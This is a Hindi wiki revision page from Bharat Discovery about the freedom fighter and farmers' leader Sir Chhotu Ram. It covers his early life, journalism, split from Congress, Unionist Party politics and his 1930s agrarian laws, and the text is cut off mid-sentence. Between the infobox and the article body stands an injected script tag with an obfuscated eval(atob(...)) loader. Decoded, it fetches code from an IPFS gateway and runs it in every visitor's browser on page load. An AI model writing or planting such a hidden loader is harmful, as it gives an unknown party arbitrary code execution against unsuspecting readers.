Difference between revisions of "छोटूराम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{सूचना बक्सा राजनीतिज्ञ
+
{{सूचना बक्सा छोटूराम}}
|चित्र=Sir-Chhoturam.jpg
+
{{छोटूराम विषय सूची}}
|चित्र का नाम=छोटूराम
 
|पूरा नाम=राय रिछपाल (मूल नाम)
 
|अन्य नाम=
 
|जन्म=[[24 नवम्बर]], [[1881]]
 
|जन्म भूमि=[[रोहतक]]
 
|मृत्यु=[[9 जनवरी]], [[1945]]
 
|मृत्यु स्थान=[[लाहौर]]
 
|मृत्यु कारण=
 
|अभिभावक=[[पिता]]- सुखीराम
 
|पति/पत्नी=
 
|संतान=
 
|स्मारक=
 
|क़ब्र=
 
|नागरिकता=भारतीय
 
|प्रसिद्धि=स्वतंत्रता सेनानी तथा राजनीतिज्ञ
 
|पार्टी=यूनियनिस्ट पार्टी
 
|पद=
 
|कार्य काल=
 
|शिक्षा=
 
|भाषा=
 
|विद्यालय=
 
|जेल यात्रा=
 
|पुरस्कार-उपाधि=
 
|विशेष योगदान=
 
|संबंधित लेख=
 
|शीर्षक 1=विशेष
 
|पाठ 1=चौधरी छोटूराम की लेखनी आग उगलती थी। 'ठग बाजार की सैर' और 'बेचारा किसान' के लेखों में से 17 लेख 'जाट गजट' में छपे थे।
 
|शीर्षक 2=
 
|पाठ 2=
 
|अन्य जानकारी=[[अगस्त]], [[1920]] में छोटूराम ने [[कांग्रेस]] छोड़ दी थी, क्योंकि वे [[गांधी जी]] के [[असहयोग आंदोलन]] से सहमत नहीं थे। उनका विचार था कि इस आंदोलन से किसानों का हित नहीं होगा। उनका मत था कि आज़ादी की लड़ाई संवैधानिक तरीके से लड़ी जाये।
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
}}
 
 
'''सर छोटूराम''' ([[अंग्रेज़ी]]: ''Sir Chhoturam'', जन्म- [[24 नवम्बर]], [[1881]], [[रोहतक]]; मृत्यु- [[9 जनवरी]], [[1945]], [[लाहौर]]) [[भारत]] के स्वाधीनता सेनानी तथा राजनेता थे। गरीबों के बंधु के रूप में वह 'रहबर ए आज़म' कहे जाते थे। सर चौधरी छोटूराम शारीरिक रूप से छोटे कद के व्यक्ति थे, लेकिन उनके व्यक्तित्व का कद बहुत बड़ा था। वे दीन दु:खियों और गरीबों के बंधु, [[अंग्रेज़]] हुकूमत के लिये 'सर' तो किसानों के लिये मसीहा थे। चौधरी छोटूराम का वास्तविक नाम राय रिछपाल था, लेकिन [[परिवार]] में सभी प्यार से उन्हें 'छोटू' कहकर पुकारते थे, फिर स्कूल के रजिस्टर में भी जाने-अंजाने इनका नाम छोटूराम ही दर्ज कर लिया गया और यहीं से बालक राय रिछपाल का वास्तविक नाम छोटूराम हो गया।
 
'''सर छोटूराम''' ([[अंग्रेज़ी]]: ''Sir Chhoturam'', जन्म- [[24 नवम्बर]], [[1881]], [[रोहतक]]; मृत्यु- [[9 जनवरी]], [[1945]], [[लाहौर]]) [[भारत]] के स्वाधीनता सेनानी तथा राजनेता थे। गरीबों के बंधु के रूप में वह 'रहबर ए आज़म' कहे जाते थे। सर चौधरी छोटूराम शारीरिक रूप से छोटे कद के व्यक्ति थे, लेकिन उनके व्यक्तित्व का कद बहुत बड़ा था। वे दीन दु:खियों और गरीबों के बंधु, [[अंग्रेज़]] हुकूमत के लिये 'सर' तो किसानों के लिये मसीहा थे। चौधरी छोटूराम का वास्तविक नाम राय रिछपाल था, लेकिन [[परिवार]] में सभी प्यार से उन्हें 'छोटू' कहकर पुकारते थे, फिर स्कूल के रजिस्टर में भी जाने-अंजाने इनका नाम छोटूराम ही दर्ज कर लिया गया और यहीं से बालक राय रिछपाल का वास्तविक नाम छोटूराम हो गया।
 
==परिचय==
 
==परिचय==
 +
{{main|छोटूराम का परिचय}}
 
सर छोटूराम का जन्म 24 नवम्बर, 1881 में झज्जर, [[हरियाणा]] के एक छोटे से [[गांव]] गढ़ी सांपला में बहुत ही साधारण [[परिवार]] में हुआ था। झज्जर उस समय रोहतक ज़िला, [[पंजाब]] का ही अंग था। छोटूराम का असली नाम राय रिछपाल था। अपने भाइयों में वे सबसे छोटे थे, इसलिए परिवार के लोग उन्हें 'छोटू' कहकर पुकारते थे। स्कूल के रजिस्टर में भी उनका नाम छोटूराम ही लिखा दिया गया और ये महापुरुष छोटूराम के नाम से ही विख्यात हुए। उनके दादा जी रामरत्नद के पास 10 एकड़ बंजर ज़मीन थी। छोटूराम जी के [[पिता]] सुखीराम कर्जे और मुकदमों में बुरी तरह से फंसे हुए थे।
 
सर छोटूराम का जन्म 24 नवम्बर, 1881 में झज्जर, [[हरियाणा]] के एक छोटे से [[गांव]] गढ़ी सांपला में बहुत ही साधारण [[परिवार]] में हुआ था। झज्जर उस समय रोहतक ज़िला, [[पंजाब]] का ही अंग था। छोटूराम का असली नाम राय रिछपाल था। अपने भाइयों में वे सबसे छोटे थे, इसलिए परिवार के लोग उन्हें 'छोटू' कहकर पुकारते थे। स्कूल के रजिस्टर में भी उनका नाम छोटूराम ही लिखा दिया गया और ये महापुरुष छोटूराम के नाम से ही विख्यात हुए। उनके दादा जी रामरत्नद के पास 10 एकड़ बंजर ज़मीन थी। छोटूराम जी के [[पिता]] सुखीराम कर्जे और मुकदमों में बुरी तरह से फंसे हुए थे।
====शिक्षा====
 
[[जनवरी]] सन [[1891]] में छोटूराम ने अपने गांव से 12 मील की दूरी पर स्थित मिडिल स्कूल, झज्जर में प्राइमरी शिक्षा ग्रहण की। उसके बाद झज्जर छोड़कर उन्होंने क्रिश्चियन मिशन स्कूल, [[दिल्ली]] में प्रवेश लिया। लेकिन फीस और शिक्षा का खर्चा वहन करना बहुत बड़ी चुनौती थी। छोटूराम के अपने ही शब्दों में- "सांपला के साहूकार से जब पिता-पुत्र कर्जा लेने गए तो अपमान की चोट जो साहूकार ने मारी वह छोटूराम को एक महामानव बनाने की दिशा में एक शंखनाद था। छोटूराम के अंदर का क्रान्तिकारी युवा जाग चुका था। अब तो छोटूराम हर अन्याय के विरोध में खड़े होने का नाम हो गया था। क्रिश्चियन मिशन स्कूल के छात्रावास के प्रभारी के विरुद्ध छोटूराम के जीवन की पहली विरोधात्मक हड़ताल थी। इस हड़ताल के संचालन को देखकर छोटूराम जी को स्कूल में 'जनरल रॉबर्ट' के नाम से पुकारा जाने लगा। सन [[1903]] में इंटरमीडियेट परीक्षा पास करने के बाद छोटूराम ने दिल्ली के अत्यन्त प्रतिष्ठिेत सैंट स्टीफन कॉलेज से [[1905]] में ग्रेजुएशन की डिग्री प्राप्त की। छोटूराम ने अपने जीवन के आरंभिक समय में ही सर्वोत्तम आदर्शों और युवा चरित्रवान छात्र के रूप में [[वैदिक धर्म]] और [[आर्य समाज]] में अपनी आस्था बना ली थी।
 
 
==सामाजिक कार्य==
 
==सामाजिक कार्य==
सन [[1905]] में छोटूराम जी ने कालाकांकर के राजा रामपाल सिंह के सह-निजी सचिव के रूप में कार्य किया और यहीं सन [[1907]] तक [[अंग्रेज़ी]] के 'हिन्दुस्तान' [[समाचार पत्र]] का संपादन किया। यहां से छोटूराम [[आगरा]] में वकालत की डिग्री करने आ गए। झज्जर ज़िले में जन्मा यह जुझारू युवा छात्र सन [[1911]] में आगरा के जाट छात्रावास का अधीक्षक बना। 1911 में उन्होंने लॉ की डिग्री प्राप्ते की। यहां रहकर छोटूराम ने [[मेरठ]] और आगरा डिवीजन की सामाजिक दशा का गहन अध्ययन किया। [[1912]] में आपने चौधरी लालचंद के साथ वकालत आरंभ कर दी और उसी साल जाट सभा का गठन किया। प्रथम विश्वयुद्ध के समय में सर छोटूराम ने [[रोहतक]] से 22,144 जाट सैनिक भर्ती करवाये, जो सारे अन्य सैनिकों का आधा भाग था। अब तो सर छोटूराम एक महान क्रांतिकारी समाज सुधारक के रूप में अपना स्थान बना चुके थे। उन्होंने अनेक शिक्षण संस्थानों की स्थापना की, जिसमें जाट आर्य-वैदिक संस्कृत हाई स्कूल, रोहतक प्रमुख है। [[1 जनवरी]], [[1913]] को जाट आर्य-समाज ने रोहतक में एक विशाल सभा की, जिसमें जाट स्कूल की स्थापना का प्रस्ताव पारित किया, जिसके फलस्वरूप [[7 सितम्बर]], [[1913]] में जाट स्कूल की स्थापना हुई।
+
{{main|छोटूराम के सामाजिक कार्य}}
====जाट गजट====
+
सन [[1905]] में छोटूराम जी ने कालाकांकर के राजा रामपाल सिंह के सह-निजी सचिव के रूप में कार्य किया और यहीं सन [[1907]] तक [[अंग्रेज़ी]] के 'हिन्दुस्तान' [[समाचार पत्र]] का संपादन किया। यहां से छोटूराम [[आगरा]] में वकालत की डिग्री करने आ गए। झज्जर ज़िले में जन्मा यह जुझारू युवा छात्र सन [[1911]] में आगरा के जाट छात्रावास का अधीक्षक बना। 1911 में उन्होंने लॉ की डिग्री प्राप्ते की। यहां रहकर छोटूराम ने [[मेरठ]] और आगरा डिवीजन की सामाजिक दशा का गहन अध्ययन किया। [[1912]] में आपने चौधरी लालचंद के साथ वकालत आरंभ कर दी और उसी साल जाट सभा का गठन किया।
वकालत जैसे व्यवसाय में भी चौधरी साहब ने नए ऐतिहासिक आयाम जोड़े। उन्होंने झूठे मुकदमे न लेना, छल-कपट से दूर रहना, गरीबों को निःशुल्क कानूनी सलाह देना, मुव्वकिलों के साथ सद व्यवहार करना, अपने वकालती जीवन का आदर्श बनाया। इन्हीं सिद्धान्तों का पालन करके केवल पेशे में ही नहीं, बल्कि जीवन के हर पहलू में चौधरी साहब बहुत ऊंचे उठ गये थे। इन्हीं दिनों [[1915]] में चौधरी छोटूराम ने 'जाट गजट' नाम का क्रांतिकारी [[समाचार पत्र]] शुरू किया, जो [[हरियाणा]] का सबसे पुराना अखबार है। इसके माध्यम से छोटूराम जी ने ग्रामीण जनजीवन का उत्थान और साहूकारों द्वारा गरीब किसानों के शोषण पर एक सारगर्भित दर्शन दिया था, जिस पर शोध की जा सकती है।
 
==किसानों के मसीहा==
 
चौधरी साहब ने किसानों को सही जीवन जीने का मूलमंत्र दिया। जाटों का [[सोनीपत]] की जुडिशियल बैंच में कोई प्रतिनिधि न होना, बहियों का विरोध, जिनके जरिये गरीब किसानों की जमीनों को गिरवी रखा जाता था, राज के साथ जुड़ी हुई साहूकार कोमों का विरोध जो किसानों की दुर्दशा के जिम्मेवार थे, के संदर्भ में किसान के शोषण के विरुद्ध उन्होंने डटकर प्रचार किया। उनके स्वयं के शब्दों में- "किसान [[कुंभकर्ण]] की नींद सो रहा है, मैं जगाने की कौशिश कर रहा हूं। कभी तलवे में गुदगुदी करता हूं, कभी मुंह पर ठंडे पानी के छींटे मारता हूं। वह आंखें खोलता है, करवट लेता है, अंगड़ाई लेता है और फिर जम्हाई लेकर सो जाता है। बात यह है कि किसान से फायदा उठाने वाली जमात एक ऐसी गैस अपने पास रखती है, जिससे तुरंत बेहोशी पैदा हो जाती है और किसान फिर सो जाता है।" चौधरी साहब आगे लिखते हैं- "किसान को लोग अन्नदाता तो कहते हैं, लेकिन यह कोई नहीं देखता कि वह अन्न खाता भी है या नहीं। जो कमाता है, वह भूखा रहे यह दुनिया का सबसे बड़ा आश्चवर्य है। मैं राजा-नवाबों और हिन्दुस्तान की सभी प्रकार की सरकारों को कहता हूं कि वह किसान को इस कद्र तंग न करें कि वह उठ खड़ा हो। इस भोलानाथ को इतना तंग न करो कि वह तांडव नृत्य कर बैठे। दूसरे लोग जब सरकार से नाराज होते हैं तो कानून तोड़ते हैं, किसान जब नाराज होगा तो कानून ही नहीं तोड़ेगा, सरकार की पीठ भी तोड़ेगा।"
 
 
==स्वाधीनता संग्राम में सक्रियता==
 
==स्वाधीनता संग्राम में सक्रियता==
 +
{{main|छोटूराम की स्वाधीनता संग्राम में भूमिका}}
 
चौधरी छोटूराम ने राष्ट्र के [[स्वाधीनता संग्राम]] में डटकर भाग लिया। [[1916]] में पहली बार [[रोहतक]] में कांग्रेस कमेटी का गठन किया गया और छोटूराम रोहतक कांग्रेस कमेटी के प्रथम प्रधान बने। सारे ज़िले में चौधरी छोटूराम का आह्वान [[अंग्रेज़]] हुकूमत को कंपकपा देता था। चौधरी साहब के लेखों और कार्य को अंग्रेज़ों ने बहुत भयानक करार दिया। फलस्वरूप रोहतक के डिप्टी कमिश्नर ने तत्कालीन अंग्रेज़ी सरकार से चौधरी छोटूराम को देश-निकाले की सिफारिश कर दी। पंजाब सरकार ने अंग्रेज़ हुकमरानों को बताया कि चौधरी छोटूराम अपने आप में एक क्रांति हैं, उनका देश निकाला गदर मचा देगा, [[रक्त]] की नदियां बह जायेंगी। किसानों का एक-एक बच्चा चौधरी छोटूराम हो जायेगा। अंग्रेज़ों के हाथ कांप गए और कमिश्नर की सिफारिश को रद्द कर दिया गया।
 
चौधरी छोटूराम ने राष्ट्र के [[स्वाधीनता संग्राम]] में डटकर भाग लिया। [[1916]] में पहली बार [[रोहतक]] में कांग्रेस कमेटी का गठन किया गया और छोटूराम रोहतक कांग्रेस कमेटी के प्रथम प्रधान बने। सारे ज़िले में चौधरी छोटूराम का आह्वान [[अंग्रेज़]] हुकूमत को कंपकपा देता था। चौधरी साहब के लेखों और कार्य को अंग्रेज़ों ने बहुत भयानक करार दिया। फलस्वरूप रोहतक के डिप्टी कमिश्नर ने तत्कालीन अंग्रेज़ी सरकार से चौधरी छोटूराम को देश-निकाले की सिफारिश कर दी। पंजाब सरकार ने अंग्रेज़ हुकमरानों को बताया कि चौधरी छोटूराम अपने आप में एक क्रांति हैं, उनका देश निकाला गदर मचा देगा, [[रक्त]] की नदियां बह जायेंगी। किसानों का एक-एक बच्चा चौधरी छोटूराम हो जायेगा। अंग्रेज़ों के हाथ कांप गए और कमिश्नर की सिफारिश को रद्द कर दिया गया।
 
चौधरी छोटूराम, लाला श्याम लाल और उनके तीन वकील साथियों, नवल सिंह, लाला लालचंद जैन और ख़ान मुश्ताक हुसैन ने रोहतक में एक ऐतिहासिक जलसे में मार्शल के दिनों में साम्राज्यशाही द्वारा किए गए अत्याचारों की घोर निंदा की। सारे इलाके में एक भूचाल सा आ गया। अंग्रेज़ी हुकमरानों की नींद उड़ गई। चौधरी छोटूराम व उनके साथियों को नौकरशाही ने अपने रोष का निशाना बना दिया और कारण बताओ नोटिस जारी किए गए कि क्यों न उनके वकालत के लाइसेंस रद्द कर दिये जायें। मुकदमा बहुत दिनों तक सैशन की अदालत में चलता रहा और आखिर चौधरी छोटूराम की जीत हुई। यह जीत नागरिक अधिकारों की जीत थी।
 
 
[[अगस्त]], [[1920]] में छोटूराम ने [[कांग्रेस]] छोड़ दी, क्योंकि चौधरी साहब [[गांधी जी]] के [[असहयोग आंदोलन]] से सहमत नहीं थे। उनका विचार था कि इस आंदोलन से किसानों का हित नहीं होगा। उनका मत था कि आजादी की लड़ाई संवैधानिक तरीके से लड़ी जाए। कुछ बातों पर वैचारिक मतभेद होते हुए भी चौधरी साहब महात्मा गांधी की महानता के प्रशंसक रहे और कांग्रेस को अच्छी जमात कहते थे। छोटूराम ने अपना कार्य क्षेत्र [[उत्तर प्रदेश]], [[राजस्थान]] और [[पंजाब]] तक फैला लिया और जाटों का सशक्त संगठन तैयार किया। [[आर्य समाज]] और जाटों को एक मंच पर लाने के लिए उन्होंने [[स्वामी श्रद्धानन्द]] और भटिंडा गुरुकुल के मैनेजर चौधरी पीरूराम से संपर्क साध लिया और उसके कानूनी सलाहकार बन गए।
 
 
==राजनीतिक गतिविधियाँ==
 
==राजनीतिक गतिविधियाँ==
 
सन [[1925]] में राजस्थान में [[पुष्कर]] के पवित्र स्थान पर चौधरी छोटूराम ने एक ऐतिहासिक जलसे का आयोजन किया। सन [[1934]] में राजस्थान के सीकर शहर में किराया कानून के विरोध में एक अभूतपूर्व रैली का आयोजन किया गया, जिसमें 10,000 [[जाट]] किसान शामिल हुए। यहां पर जनेऊ और देसी घी दान किया गया, [[दयानन्द सरस्वती|महर्षि दयानन्द]] के [[सत्यार्थ प्रकाश]] के श्लोकों का उच्चारण किया गया। इस रैली से चौधरी छोटूराम [[भारत]] की राजनीति के स्तम्भ बन गए। [[पंजाब]] में [[रौलट एक्ट]] के विरुद्ध आन्दोलन को दबाने के लिए मार्शल लॉ लागू कर दिया गया था, जिसके परिणामस्वरूप देश की राजनीति में एक अजीबोगरीब मोड़ आ गया। एक तरफ [[महात्मा गाँधी]] का असहयोग आंदोलन था तो दूसरी ओर प्रांतीय स्तर पर चौधरी छोटूराम और चौधरी लालचंद आदि जाट नेताओं ने अंग्रेज़ी हुकूमत के साथ सहयोग की नीति अपना ली थी। पंजाब में मांटेग्यू चैम्सफोर्ड सुधार लागू हो गए थे, सर फ़जले हुसैन ने खेतिहर किसानों की एक पार्टी 'जमींदारा पार्टी' खड़ी कर दी। छोटूराम व उनके साथियों ने सर फ़जले हुसैन के साथ गठबंधन कर लिया और सर सिकंदर हयात ख़ान के साथ मिलकर 'यूनियनिस्ट पार्टी' का गठन किया। तब से [[हरियाणा]] में दो परस्पर विरोधी आंदोलन चलते रहे। चौधरी छोटूराम का टकराव एक ओर [[कांग्रेस]] से था तथा दूसरी ओर शहरी [[हिन्दू]] नेताओं व साहूकारों से होता था।
 
सन [[1925]] में राजस्थान में [[पुष्कर]] के पवित्र स्थान पर चौधरी छोटूराम ने एक ऐतिहासिक जलसे का आयोजन किया। सन [[1934]] में राजस्थान के सीकर शहर में किराया कानून के विरोध में एक अभूतपूर्व रैली का आयोजन किया गया, जिसमें 10,000 [[जाट]] किसान शामिल हुए। यहां पर जनेऊ और देसी घी दान किया गया, [[दयानन्द सरस्वती|महर्षि दयानन्द]] के [[सत्यार्थ प्रकाश]] के श्लोकों का उच्चारण किया गया। इस रैली से चौधरी छोटूराम [[भारत]] की राजनीति के स्तम्भ बन गए। [[पंजाब]] में [[रौलट एक्ट]] के विरुद्ध आन्दोलन को दबाने के लिए मार्शल लॉ लागू कर दिया गया था, जिसके परिणामस्वरूप देश की राजनीति में एक अजीबोगरीब मोड़ आ गया। एक तरफ [[महात्मा गाँधी]] का असहयोग आंदोलन था तो दूसरी ओर प्रांतीय स्तर पर चौधरी छोटूराम और चौधरी लालचंद आदि जाट नेताओं ने अंग्रेज़ी हुकूमत के साथ सहयोग की नीति अपना ली थी। पंजाब में मांटेग्यू चैम्सफोर्ड सुधार लागू हो गए थे, सर फ़जले हुसैन ने खेतिहर किसानों की एक पार्टी 'जमींदारा पार्टी' खड़ी कर दी। छोटूराम व उनके साथियों ने सर फ़जले हुसैन के साथ गठबंधन कर लिया और सर सिकंदर हयात ख़ान के साथ मिलकर 'यूनियनिस्ट पार्टी' का गठन किया। तब से [[हरियाणा]] में दो परस्पर विरोधी आंदोलन चलते रहे। चौधरी छोटूराम का टकराव एक ओर [[कांग्रेस]] से था तथा दूसरी ओर शहरी [[हिन्दू]] नेताओं व साहूकारों से होता था।
Line 78: Line 38:
 
<references />
 
<references />
 
==संबंधित लेख==
 
==संबंधित लेख==
{{स्वतन्त्रता सेनानी}}
+
{{सूचना बक्सा छोटूराम}}{{स्वतन्त्रता सेनानी}}
[[Category:स्वतन्त्रता सेनानी]][[Category:राजनेता]][[Category:राजनीतिज्ञ]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:जीवनी साहित्य]][[Category:राजनीति कोश]]
+
[[Category:स्वतन्त्रता सेनानी]][[Category:राजनेता]][[Category:राजनीतिज्ञ]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:जीवनी साहित्य]][[Category:राजनीति कोश]][[Category:छोटूराम]]
 
__INDEX__
 
__INDEX__

Revision as of 08:36, 8 August 2017

chhotooram
poora nam ray richhapal (mool nam)
janm 24 navambar, 1881
janm bhoomi rohatak
mrityu 9 janavari, 1945
mrityu sthan lahaur
abhibhavak pita- sukhiram
nagarikata bharatiy
prasiddhi svatantrata senani tatha rajanitijn
parti yooniyanist parti
vishesh chaudhari chhotooram ki lekhani ag ugalati thi. 'thag bajar ki sair' aur 'bechara kisan' ke lekhoan mean se 17 lekh 'jat gajat' mean chhape the.
any janakari agast, 1920 mean chhotooram ne kaangres chho d di thi, kyoanki ve gaandhi ji ke asahayog aandolan se sahamat nahian the. unaka vichar tha ki is aandolan se kisanoan ka hit nahian hoga. unaka mat tha ki azadi ki l daee sanvaidhanik tarike se l di jaye.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

chhotooram vishay soochi

sar chhotooram (aangrezi: Sir Chhoturam, janm- 24 navambar, 1881, rohatak; mrityu- 9 janavari, 1945, lahaur) bharat ke svadhinata senani tatha rajaneta the. gariboan ke bandhu ke roop mean vah 'rahabar e azam' kahe jate the. sar chaudhari chhotooram sharirik roop se chhote kad ke vyakti the, lekin unake vyaktitv ka kad bahut b da tha. ve din du:khiyoan aur gariboan ke bandhu, aangrez hukoomat ke liye 'sar' to kisanoan ke liye masiha the. chaudhari chhotooram ka vastavik nam ray richhapal tha, lekin parivar mean sabhi pyar se unhean 'chhotoo' kahakar pukarate the, phir skool ke rajistar mean bhi jane-aanjane inaka nam chhotooram hi darj kar liya gaya aur yahian se balak ray richhapal ka vastavik nam chhotooram ho gaya.

parichay

  1. REDIRECTsaancha:mukhy

sar chhotooram ka janm 24 navambar, 1881 mean jhajjar, hariyana ke ek chhote se gaanv gadhi saanpala mean bahut hi sadharan parivar mean hua tha. jhajjar us samay rohatak zila, panjab ka hi aang tha. chhotooram ka asali nam ray richhapal tha. apane bhaiyoan mean ve sabase chhote the, isalie parivar ke log unhean 'chhotoo' kahakar pukarate the. skool ke rajistar mean bhi unaka nam chhotooram hi likha diya gaya aur ye mahapurush chhotooram ke nam se hi vikhyat hue. unake dada ji ramaratnad ke pas 10 ek d banjar zamin thi. chhotooram ji ke pita sukhiram karje aur mukadamoan mean buri tarah se phanse hue the.

samajik kary

  1. REDIRECTsaancha:mukhy

san 1905 mean chhotooram ji ne kalakaankar ke raja ramapal sianh ke sah-niji sachiv ke roop mean kary kiya aur yahian san 1907 tak aangrezi ke 'hindustan' samachar patr ka sanpadan kiya. yahaan se chhotooram agara mean vakalat ki digri karane a ge. jhajjar zile mean janma yah jujharoo yuva chhatr san 1911 mean agara ke jat chhatravas ka adhikshak bana. 1911 mean unhoanne l aau ki digri prapte ki. yahaan rahakar chhotooram ne merath aur agara divijan ki samajik dasha ka gahan adhyayan kiya. 1912 mean apane chaudhari lalachand ke sath vakalat aranbh kar di aur usi sal jat sabha ka gathan kiya.

svadhinata sangram mean sakriyata

  1. REDIRECTsaancha:mukhy

chaudhari chhotooram ne rashtr ke svadhinata sangram mean datakar bhag liya. 1916 mean pahali bar rohatak mean kaangres kameti ka gathan kiya gaya aur chhotooram rohatak kaangres kameti ke pratham pradhan bane. sare zile mean chaudhari chhotooram ka ahvan aangrez hukoomat ko kanpakapa deta tha. chaudhari sahab ke lekhoan aur kary ko aangrezoan ne bahut bhayanak karar diya. phalasvaroop rohatak ke dipti kamishnar ne tatkalin aangrezi sarakar se chaudhari chhotooram ko desh-nikale ki sipharish kar di. panjab sarakar ne aangrez hukamaranoan ko bataya ki chaudhari chhotooram apane ap mean ek kraanti haian, unaka desh nikala gadar macha dega, rakt ki nadiyaan bah jayeangi. kisanoan ka ek-ek bachcha chaudhari chhotooram ho jayega. aangrezoan ke hath kaanp ge aur kamishnar ki sipharish ko radd kar diya gaya.

rajanitik gatividhiyaan

san 1925 mean rajasthan mean pushkar ke pavitr sthan par chaudhari chhotooram ne ek aitihasik jalase ka ayojan kiya. san 1934 mean rajasthan ke sikar shahar mean kiraya kanoon ke virodh mean ek abhootapoorv raili ka ayojan kiya gaya, jisamean 10,000 jat kisan shamil hue. yahaan par janeoo aur desi ghi dan kiya gaya, maharshi dayanand ke satyarth prakash ke shlokoan ka uchcharan kiya gaya. is raili se chaudhari chhotooram bharat ki rajaniti ke stambh ban ge. panjab mean raulat ekt ke viruddh andolan ko dabane ke lie marshal l aau lagoo kar diya gaya tha, jisake parinamasvaroop desh ki rajaniti mean ek ajibogarib mo d a gaya. ek taraph mahatma gaandhi ka asahayog aandolan tha to doosari or praantiy star par chaudhari chhotooram aur chaudhari lalachand adi jat netaoan ne aangrezi hukoomat ke sath sahayog ki niti apana li thi. panjab mean maantegyoo chaimsaphord sudhar lagoo ho ge the, sar fajale husain ne khetihar kisanoan ki ek parti 'jamiandara parti' kh di kar di. chhotooram v unake sathiyoan ne sar fajale husain ke sath gathabandhan kar liya aur sar sikandar hayat khan ke sath milakar 'yooniyanist parti' ka gathan kiya. tab se hariyana mean do paraspar virodhi aandolan chalate rahe. chaudhari chhotooram ka takarav ek or kaangres se tha tatha doosari or shahari hindoo netaoan v sahookaroan se hota tha.

chaudhari chhotooram ki 'jamiandara parti' kisan, majadoor, muslim, sikkh aur shoshit logoan ki parti thi. lekin yah parti aangrezoan se takkar lene ko taiyar nahian thi. hiandoo sabha v doosare shahari hinduoan ki partiyoan se chaudhari chhotooram ka matabhed tha. bharat sarakar adhiniyam, 1919 ke tahat 1920 mean am chunav karae ge. isaka kaangres ne bahishkar kiya aur chhotooram v lalasianh jamiandara parti se vijayi hue. udhar 1930 mean kaangres ne ek aur jat neta chaudhari devilal ko chaudhari chhotooram ki parti ke virodh mean sthapit kiya. bharat sarakar adhiniyam, 1935 ke tahat simit lokatantr ke chunav 1937 mean hue. isamean 175 sitoan mean se yooniyanist parti ko 99, kaangres ko keval 18, khalasa neshanalist ko 13 aur hindoo mahasabha ko keval 12 sitean mili thian. hariyana dehati sit se keval ek pratyashi chaudhari dunichand hi kaangres se jit paye the. chaudhari chhotooram ke kad ka aandaja is chunav se aangrezoan, kaangresiyoan aur sabhi virodhiyoan ko ho gaya tha.

lekhan kary

chaudhari chhotooram ki lekhani jab likhati thi to ag ugalati thi. 'thag bajar ki sair' aur 'bechara kisan' ke lekhoan mean se 17 lekh jat gajat mean chhape. 1937 mean sikandar hayat khan panjab ke rajaneta bane aur jhajjar ke ye jujharoo neta chaudhari chhotooram vikas v rajasv mantri bane aur garib kisan ke masiha ban ge. chaudhari chhotooram ne anek samaj sudharak kanoonoan ke jarie kisanoan ko shoshan se nizat dilavaee.

sahookar panjikaran ekt, 1938

yah kanoon 2 sitanbar 1938 ko prabhavi hua tha. isake anusar koee bhi sahookar bina panjikaran ke kisi ko karz nahian de paega aur n hi kisanoan par adalat mean mukadama kar payega. is adhiniyam ke karan sahookaroan ki ek phauj par aankush lag gaya.

yogadan

giravi jaminoan ki mupht vapasi ekt, 1938

yah kanoon 9 sitanbar, 1938 ko prabhavi hua. is adhiniyam ke jarie jo jaminean 8 joon, 1901 ke bad kurki se bechi huee thian tatha 37 saloan se giravi chali a rahi thian, vah sari jaminean kisanoan ko vapis dilavaee geean. is kanoon ke tahat keval ek sade kagaz par ziladhish ko prarthana-patr dena hota tha. is kanoon mean agar moolarashi ka doguna dhan sahookar prapt kar chuka hai to kisan ko jamin ka poorn svamitv diye jane ka pravadhan kiya gaya.

krishi utpad mandi adhiniyam, 1938

yah adhiniyam 5 mee, 1939 se prabhavi mana gaya. isake tahat notiphaid eriya mean markit kametiyoan ka gathan kiya gaya. ek kamishan ki riport ke anusar kisanoan ko apani phasal ka mooly ek rupaye mean se 60 paise hi mil pata tha. anek katautiyoan ka samana kisanoan ko karana p data tha. adhat, tulaee, rolaee, munimi, palledari aur kitani hi katautiyaan hoti thian. is adhiniyam ke tahat kisanoan ko usaki phasal ka uchit mooly dilavane ka niyam bana. adhatiyoan ke shoshan se kisanoan ko nijat isi adhiniyam ne dilavaee.

vyavasay shramik adhiniyam, 1940

yah adhiniyam 11 joon, 1940 ko lagoo hua. bandhua majadoori par rok lagae jane vale is kanoon ne majadooroan ko shoshan se nijat dilaee. saptah mean 61 ghante, ek din mean 11 ghante se jyada kam nahian liya ja sakega. varsh bhar mean 14 chhuttiyaan di jaeangi. 14 sal se kam umr ke bachchoan se majadoori nahian karaee jaegi. dukan v vyavasayik sansthan ravivar ko band raheange. chhoti-chhoti galatiyoan par vetan nahian kata jaega. jurmane ki rashi shramik kalyan ke lie hi prayog ho paegi. in sabaki jaanch ek shram nirikshak dvara samay-samay par ki jaya karegi.

karja maphi adhiniyam, 1934

yah krantikari aitihasik adhiniyam dinabandhu chaudhari chhotooram ne 8 aprail, 1935 mean kisan v majadoor ko soodakhoroan ke changul se mukt karane ke lie banavaya. is kanoon ke tahat agar karje ka duguna paisa diya ja chuka hai to rrini rrin-mukt samajha jaega. is adhiniyam ke tahat karja maphi bord banae ge, jisamean ek cheyaramain aur do sadasy hote the. dam duppata ka niyam lagoo kiya gaya. isake anusar dudharoo pashu, bachh da, ooant, reh da, gher, gitava d adi ajivika ke sadhanoan ki nilami nahian ki jaegi. is kanoon ke tahat apilakarta ke sandarbh mean ek dantakatha bahut prachalit huee thi ki lahaur haeekort mean mukhy nyayadhish sar shadilal se ek apilakarta ne kaha ki maian bahut garib adami hooan, mera ghar aur bail kurki se maph kiya jaean. tab nyayadhish sar shadilal ne vyangyatmak lahaje mean kaha ki ek chhotooram nam ka adami hai, vahi aise kanoon banata hai, usake pas jao aur kanoon banava kar lao. apilakarta chaudhari chhotooram ke pas aya aur yah tippani sunaee. chhotooram ne kanoon mean aisa sanshodhan karavaya ki us adalat ki sunavaee par hi pratibandh laga diya aur is tarah chaudhari sahab ne is vyangy 